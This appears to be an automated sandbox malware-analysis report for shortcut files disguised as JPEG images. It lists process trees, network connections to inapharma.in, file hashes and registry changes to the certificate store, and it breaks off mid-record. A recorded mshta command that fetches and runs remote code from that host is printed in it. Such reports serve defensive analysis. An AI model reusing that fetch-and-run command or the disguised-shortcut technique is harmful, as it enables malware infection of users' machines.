"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff60bf35460,0x7ff60bf35470,0x7ff60bf35480

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2328,10957527560776086265,9873100065652089575,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6928 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2328,10957527560776086265,9873100065652089575,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2232 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2328,10957527560776086265,9873100065652089575,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4280 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2328,10957527560776086265,9873100065652089575,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1340 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2328,10957527560776086265,9873100065652089575,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1868 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2328,10957527560776086265,9873100065652089575,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4328 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2328,10957527560776086265,9873100065652089575,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4372 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2328,10957527560776086265,9873100065652089575,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6876 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2328,10957527560776086265,9873100065652089575,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5776 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2328,10957527560776086265,9873100065652089575,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6472 /prefetch:8

Network

Country Destination Domain Proto
US 52.109.8.20:443 tcp
US 8.8.8.8:53 api.msn.com udp
US 204.79.197.203:443 api.msn.com tcp
NL 104.80.225.205:443 tcp
BE 67.27.153.254:80 tcp
BE 67.27.153.254:80 tcp
BE 67.27.153.254:80 tcp
US 93.184.220.29:80 tcp
US 93.184.220.29:80 tcp
US 8.8.8.8:53 www.inapharma.in udp
US 162.144.86.32:443 www.inapharma.in tcp
US 162.144.86.32:443 www.inapharma.in tcp
US 162.144.86.32:443 www.inapharma.in tcp
US 8.8.8.8:53 inapharma.in udp
US 162.144.86.32:443 inapharma.in tcp
US 162.144.86.32:443 inapharma.in tcp
US 8.8.8.8:53 nav.smartscreen.microsoft.com udp
IE 20.67.219.150:443 nav.smartscreen.microsoft.com tcp
US 8.8.8.8:53 smartscreen-prod.microsoft.com udp
IE 20.67.219.150:443 smartscreen-prod.microsoft.com tcp
IE 20.67.219.150:443 smartscreen-prod.microsoft.com tcp
IE 20.67.219.150:443 smartscreen-prod.microsoft.com tcp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:443 dns.google tcp
US 8.8.8.8:443 dns.google tcp
US 8.8.8.8:443 dns.google tcp
US 8.8.8.8:443 dns.google tcp
US 8.8.8.8:443 dns.google tcp
US 8.8.8.8:443 dns.google tcp
US 8.8.8.8:443 dns.google tcp
US 8.8.8.8:443 dns.google tcp
US 8.8.8.8:443 dns.google tcp
US 8.8.8.8:443 dns.google tcp
US 8.8.8.8:443 dns.google tcp
US 8.8.8.8:443 dns.google tcp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:443 dns.google tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:443 dns.google tcp
US 8.8.8.8:443 dns.google udp
US 204.79.197.200:443 tcp
US 204.79.197.203:443 api.msn.com tcp
NL 23.73.0.135:443 tcp
NL 23.73.0.135:443 tcp
NL 23.73.0.135:443 tcp
US 204.79.197.203:443 api.msn.com tcp
US 204.79.197.200:443 tcp
NL 104.110.191.165:443 tcp
IE 52.142.114.2:443 tcp
NL 52.222.137.12:443 tcp
US 8.8.8.8:53 dns.google udp
US 204.79.197.200:443 tcp
US 8.8.8.8:443 dns.google udp
US 204.79.197.219:443 tcp
US 204.79.197.219:443 tcp
US 131.253.33.203:443 tcp
NL 104.109.143.4:443 tcp
US 204.79.197.219:443 tcp
US 204.79.197.219:443 tcp
US 8.8.8.8:53 dns.google udp
US 152.199.19.161:80 msedge.b.tlu.dl.delivery.mp.microsoft.com tcp
US 8.8.8.8:53 dns.google udp

Files

memory/1620-135-0x00007FFEB36C0000-0x00007FFEB4181000-memory.dmp

memory/1620-136-0x000001FA71D36000-0x000001FA71D37000-memory.dmp

memory/456-138-0x00000249AA960000-0x00000249AA970000-memory.dmp

memory/456-139-0x00000249AB260000-0x00000249AB270000-memory.dmp

memory/456-140-0x00000249AB5C0000-0x00000249AB5C4000-memory.dmp

memory/4476-142-0x00007FFED59E0000-0x00007FFED59E1000-memory.dmp

\??\pipe\LOCAL\crashpad_3856_ZBKBWNBSYOPETMNV

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Temp\Survey-Paper-Covid-19.pdf

MD5 b60ee43aeeb8cebf1ebaca24d7cb0f70
SHA1 6fd4e5128893ffa762659928c7a5b77efe0ded6e
SHA256 9b372997cc2d3e9dd18e925d27543bcd77bd3ab35f75b78f82832b73d7b1336d
SHA512 d9a4bcee700816ecee07428b2ba4b8da05013bccca1587817584aeb90538aa5e47e33afeb8e879484839b965057e28c21a8d4beecd8fdbc37f6cae953a0ca964

C:\Users\Admin\AppData\Local\Temp\edge_BITS_3856_1108606819\561b267d-84e8-4c62-b0b7-4e064be02aa2

MD5 e1e5c20a754c68872e8abbf1d84875e8
SHA1 3cc98edfc0a925f39c7b78ae4ec4e4425b0fd661
SHA256 dd94940b6330d77e7797a60de1183cca7b0f71ab247bea8f9ae0ff30eafc379f
SHA512 59d2ce41bfc0764a699ad0ea6eb0ff38ac05c8dfdc15004ccffc4182dc53bf5cacd77274a1d24f0cf0489edf2abea99efb0d4af7ba7d84c21e793c89273a9279

C:\Users\Admin\AppData\Local\Temp\edge_BITS_3856_1103843770\b22f5f18-f7ea-4290-929d-b13c03908334

MD5 a36d70bcd9333175811c53122f7d2c1d
SHA1 9a9a0c0ac2fc1db6e7b78868c8d4c96d747b8f1c
SHA256 26123bef7d73536450862d2c4d44963d720aa80b6fc2d8496f559cb9c1fdeb00
SHA512 e69aee2d91c50dd63030bd64cd12b5120c1db9871caf3c26b2cbf29ff96891b5f2e7d1388e4b731f77d7fb24904f379a6a8d5c1b2aacf8a8501fd0111ab0caf5

C:\Users\Admin\AppData\Local\Temp\edge_BITS_3856_1263278112\2132f61f-f790-4ae6-a355-8cf9a1533800

MD5 1a9c030cf025d340ff394cd9e5b664f3
SHA1 c1e8490662903d90de97760cb3102426f2784bd9
SHA256 a81d1959892ae4180554347df1b97834abba2e1a5e6b9aeba000ecea26eabecc
SHA512 7a9584c96849b1c8c623119bea4255a628e0f36d3a5f670e9c6a20f84d250fee859751a521322864b1577d7ca3ecdd7ee805c0f35bd7d74ddf43afc9f2abf8cb

C:\Users\Admin\AppData\Local\Temp\edge_BITS_3856_821886392\f08b21db-8a96-416f-86dc-4301cb9925a1

MD5 667b21c5101befebcd6470a748092051
SHA1 7a3cc9ff06845ad48876bae8e07dbd8a8c874ab6
SHA256 82497265352e024349df20fcb72104978e8835933bf7497e11d8b1e0a8617aae
SHA512 06d3aed70aee3e68b58c1581570aed7da7ed90eef65a9c799674bc642e77e93746337485b663b9ecbf5cf22c1d57d864334acc0d1cf2a36120df8b5325de88d5

memory/456-173-0x00000249ADAC0000-0x00000249ADAC4000-memory.dmp

memory/456-174-0x00000249ADAC0000-0x00000249ADAC4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\edge_BITS_3856_1383486776\dde93974-5cbc-4ecc-898f-436e62207c34

MD5 90a84d9fd254f82926ebd56b92b59b65
SHA1 a0c29a54a638478680101348cd253f3f2369b0aa
SHA256 2e57d294ae2ce37ac58485ec6052861ef075fea318f9fce8fafcd6bdd86ebf57
SHA512 3096dfe61aa951c331e6c1479a0812da61cd27a6b8ee16bd9896df7e6c77fab95c7ca91fa922f9a50ee10ff43fe59d3b0a03b8ef2ac91166c5eb53d842dcdfba

C:\Users\Admin\AppData\Local\Temp\edge_BITS_3856_1884419357\73e73124-8629-4742-8ed2-98964b16aa1c

MD5 5727a5a06cfee4f93421e27a74afad10
SHA1 52cd50ef6f38a72603c4f82dbe368a7d18429ed1
SHA256 126c6b7f46c5fb5fd7ee6fff6f1dee85806ee40328ef6ec0a4003a185a727905
SHA512 7e7b92db09a38b2c14d2f18b146b33804a3e80e51e5776652b011889be4a848d34a6b3f61d46104c8512112e5797b58f96500b2ca0e3bebee5f03d70b7526db0

C:\Users\Admin\AppData\Local\Temp\edge_BITS_3856_2028349882\b7f07b26-d34f-490c-8527-987fb2262813

MD5 d7c0f6591e7755dcb8935c5452c5f644
SHA1 b90059f7c4d9bef1fb1c1e3d63c704ca58bce116
SHA256 155aadeb31bc950db003f59f2806a8331c73c80be7b4960eab3bfb5b6dee0440
SHA512 df3b41653ac51eec45f7d62e95cdd142e1333472e6c24a09314fa23f8dc8a43cca4c2e629867a3e0da174021232d25460e8297aa60ccc1a8a61001a17ca77c22

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.21\Mu\CompatExceptions

MD5 900263477e1368869fbf1be99990c878
SHA1 e56e199aa4119f3cc4c4d46f96daea89bbf9685a
SHA256 7f660d9db521646e9c6510d844b6c6ea26716b620c46f34edaf7ce318a9473e4
SHA512 1035b388b4b00c744824d13c5ef48118d88abbb53e9d76896a2d96a2a127a7739c119e781d7d5f0b8d910e10539c0c502c9f937fc2487747c65e7285f4b1e6d2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.21\Sigma\Entities

MD5 ba60431b366f83677a5bf1a2e4601799
SHA1 83f828c27de5429e25c38c36ba77e069d5c7b2de
SHA256 ab895ef5f75efd49dbb4fcdf7529e50ca622d13433e067bcf8a1f1127a944da3
SHA512 aa9ff0374fb3d4bff7ee5a78dd5ace340da4af1a844f453a40b2723a91b32e6e3f4bd736fb3f3cb210b016109660a7b5cc8440901c6bb410e61530286a4e0200

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.21\Mu\Entities

MD5 0d37c9d98f35f2c6524bd9b874ec93ed
SHA1 87d2d1149db8a1c2d91bc8d2d6e2827d2d8850f5
SHA256 19ce05d2716fae5d0d6e2067a7a624c0fa7f8b02486d9469861fd30cf1c499ac
SHA512 68e73804a144cbe7287c2136ab1986c4e2a97c497d5bfd36ef5db0f1fb1b4a28839d63d83019082ce61af9b42853934888ce05d6b28350742776b97fa310a575

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.21\Sigma\Staging

MD5 9ca5eb41a53645be63d247ad8a9a7869
SHA1 2e98b04b5a2efb04d20bc7fe51b05c4e4841205b
SHA256 f67c58a61ddef715b01debc66ddc0e3c365295ac9870328f6b8bdbcb02a6b8c9
SHA512 7dd7d295ccce957490f025eef124b22c809f140a96003126b801bbbdd94eb2115ee59e7d16dd1f020b1d6eaaff66853b9de2cbf7092c1692f40dbe21ab346fd8

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.21\Sigma\Other

MD5 c6c7f3ee1e17acbff6ac22aa89b02e4e
SHA1 bdbd0220e54b80b3d2ffbbddadc89bfbb8e64a8b
SHA256 a2f9f27d6938a74979d34484bced535412969c2533dc694bfa667fe81d66d7d4
SHA512 86ed28ffdd00b4a397a20968792fcd30dd4a891a187a7789c00c88b64689b334a11fa087eb54ccee813c181cf891b43184dde7af9a6f33caed2a71e2c445a7b4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.21\Sigma\Social

MD5 976b1cf7e3442f88cd8ba26d3f0965bb
SHA1 b75438dc71de4ac761d94a215ddbffadcd1225b0
SHA256 decde67630f29fc003cb1f2ccbd7371a05079985a9cce93ec93c4fadd8dc5541
SHA512 d0472fed72e1eb0a7747a693a0e654fbe92dd028db3cc42377810d90474dd4099ac981cca333eb52c18e75ed04a1f1f79f3bf5957fe8b16086f1252b3454b8d5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.21\Sigma\Fingerprinting

MD5 a004023825237dadc8f934758ff9eaf2
SHA1 c981a900b5ce63884635cedfe5ba722416021cb2
SHA256 3c4e82aae615a7bed985b4544afecb774b728df1cc9f7561ea25b97482119ef7
SHA512 e49667fca51a6497ccae9b881d679b857c025f2945ab93c9a6769b1c0a632329993daefab6eda9ed70a32a75630d7b3d93dda5acda8ff87ffe5f090ca7b35e4f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.21\Sigma\Cryptomining

MD5 4ec1eda0e8a06238ff5bf88569964d59
SHA1 a2e78944fcac34d89385487ccbbfa4d8f078d612
SHA256 696e930706b5d391eb8778f73b0627ffc2be7f6c9a3e7659170d9d37fc4a97b5
SHA512 c9b1ed7b61f26d94d7f5eded2d42d40f3e4300eee2319fe28e04b25cdb6dd92daf67828bff453bf5fc8d7b6ceb58cab319fc0daac9b0050e27a89efe74d2734e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.21\Sigma\Content

MD5 7f077f40c2d1ce8e95faa8fdb23ed8b4
SHA1 2c329e3e20ea559974ddcaabc2c7c22de81e7ad2
SHA256 bda08f8b53c121bbc03da1f5c870c016b06fa620a2c02375988555dd12889cdf
SHA512 c1fb5d40491ae22a155a9bd115c32cbe9dbcba615545af2f1a252475f9d59844763cd7c177f08277d8ef59e873b7d885fda17f2a504d9ec2c181d0f793cb542b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.21\Sigma\Analytics

MD5 4cefbb980962973a354915a49d1b0f4d
SHA1 1d20148cab5cdadb85fad6041262584a12c2745d
SHA256 66de8db363de02974a1471153112e51f014bb05936ce870c433fd9a85b34455a
SHA512 6a088bbc6c40454165ddee3183667d2997dca5fcc8312f69e3c2397e61255e49b5146b24c2c64cd3c8867289e3abfdf1155e47722fdd8276f96d51e8f311d4b0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.21\Sigma\Advertising

MD5 d024831cae8599f0edee70275d99e843
SHA1 69e08b543802b130da5305cbb0140bda5601079c
SHA256 0b75817b9ce2164f52e537c66bbff0fe53024bf9a00fb193efd63fe48f34a978
SHA512 ee1096446f6a17bc3fde9aadb418ca4b2db5132cdde1e429300487aaf4d8b9865a3bbc95d3a3198cde137a6395f69c035b74a72f74edc22a490bccc3320b0b03

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.21\Mu\Other

MD5 cd0395742b85e2b669eaec1d5f15b65b
SHA1 43c81d1c62fc7ff94f9364639c9a46a0747d122e
SHA256 2b4a47b82cbe70e34407c7df126a24007aff8b45d5716db384d27cc1f3b30707
SHA512 4df2ce734e2f7bc5f02bb7845ea801b57dcf649565dd94b1b71f578b453ba0a17c61ccee73e7cff8f23cdd6aa37e55be5cb15f4767ff88a9a06de3623604fbf0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.21\Mu\Social

MD5 152b745da17397ed5a2f3059bb157600
SHA1 47bf4e575ba1acf47dcc99f1800f753b4cc65ef6
SHA256 ef994058a637f7b1b47c31c8670977084d1f86cc21a196920aa87f8ed31e98e8
SHA512 4984a8a46eb452b3c62f2c2ca8c9d999de37c39895ad9a9ed91d12a7731b1cd227f335829f7a6927f19cd8bf4dd7d6749fc853461a46fc97853d5b9e23171d31

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.21\Mu\Fingerprinting

MD5 b51076d21461e00fcbf3dbd2c9e96b2b
SHA1 31311536cf570f2f9c88d21f03a935ac6e233231
SHA256 21a8d3e85d76761a1aab9dca765efef5dfa08d49db037befd91833e4639dd993
SHA512 3e193220ddddc47ecea32a2f777e55faa12c7a8052323455c8d7a89c01048155c77ae009fd0f5bebea89f1fae4a88b6b3ceca4e808064f474ea5b3a9497598cb

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.21\Mu\Cryptomining

MD5 8c31feb9c3faaa9794aa22ce9f48bfbd
SHA1 f5411608a15e803afc97961b310bb21a6a8bd5b6
SHA256 6016fd3685046b33c7a2b1e785ac757df20e7c760abe0c27e1b8b0294222421d
SHA512 ba4b5886c04ba8f7a7dbb87e96d639783a5969a245de181cf620b8f536e3ac95bbd910cd2f1f6aae6c3cd70fc1ef6209dc10d2b083ec51861b51d83f95811baa

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.21\Mu\Analytics

MD5 fad197d6ffd32d1268b9e7e8d13ab32a
SHA1 b0129887a75965bb2ef56a2c39d3231e5b87265d
SHA256 4e446af739e1a06b48a73607e9441bc4aa34ceafd808ff845864408179a4d2c3
SHA512 01d9f588bfa315e316ff0ff4a15a0a49144fd77ee89960882cd528d7f7a277b086667cea2357c3ca2bd16a2b3f4aeb7fcaf473501b499101be68acbe1e0126cb

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.21\Mu\Advertising

MD5 4e9962558e74db5038d8073a5b3431aa
SHA1 3cd097d9dd4b16a69efbb0fd1efe862867822146
SHA256 6f81212bd841eca89aa6f291818b4ad2582d7cdb4e488adea98261494bdcd279
SHA512 fcd76bca998afc517c87de0db6ee54e45aa2263fa7b91653ac3adb34c41f3681fbe19d673ae9b24fdf3d53f5af4e4968e603a1eb557207f8860ac51372026b2e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.21\Mu\Content

MD5 94c183b842784d0ae69f8aa57c8ac015
SHA1 c5b1ebc2b5c140ccbb21cd377ca18f3c5d0b80cd
SHA256 aa5c4d50684aa478d5982e509cbf1f8347fbc9cc75cb847d54915c16c3a33d25
SHA512 5808ddb81657acf4712fa845c95aacbab32a414ffda3b9d1218637e2d53bd3e0d6b95c872779ead6eaa13b4d2d563494ad5587337958bd17f1e791fad5d822fb

C:\Users\Admin\AppData\Local\Temp\edge_BITS_3856_1068574658\42e51524-755c-47cb-84c5-ae02ffdda453

MD5 1f7f791122ac738c2f50ab552dbee1b1
SHA1 005ebb1a54386d8a3fa65380462842f6e083273e
SHA256 6615e489c4f6b0e1a63bc78f89a200fadfefa12da08454b4f0ffff1ffa026f21
SHA512 d3a460c599fe00119845327364641b527a1082cf0c9bf9e19d2cf5a4d79f7077548dd7ef265d3761f291b558922a2ea5b8b4ba49e078cf8ad7c85c88a68d1d70

Analysis: behavioral22

Detonation Overview

Submitted

2022-03-22 12:37

Reported

2022-03-22 12:57

Platform

win10v2004-en-20220113

Max time kernel

222s

Max time network

709s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\samples\IMG_20210111_125841.jpg.lnk

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A

Enumerates physical storage devices

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Windows\System32\mshta.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Windows\System32\mshta.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1212 wrote to memory of 1956 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe
PID 1212 wrote to memory of 1956 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\samples\IMG_20210111_125841.jpg.lnk

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" https://inapharma.in/css/files/photos/Sunakshi/IMG_20210111_125841

Network

Country Destination Domain Proto
US 8.8.8.8:53 inapharma.in udp
US 162.144.86.32:443 inapharma.in tcp
US 162.144.86.32:443 inapharma.in tcp
NL 104.110.191.133:80 tcp
NL 104.110.191.133:80 tcp
US 162.144.86.32:443 inapharma.in tcp
US 162.144.86.32:443 inapharma.in tcp
US 8.8.8.8:53 106.89.54.20.in-addr.arpa udp

Files

memory/1956-131-0x00007FFCFCF90000-0x00007FFCFDA51000-memory.dmp

Analysis: behavioral31

Detonation Overview

Submitted

2022-03-22 12:37

Reported

2022-03-22 12:58

Platform

win7-20220310-en

Max time kernel

299s

Max time network

1219s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\samples\Image-8646-ZP.jpg.lnk

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\System32\mshta.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Windows\System32\mshta.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46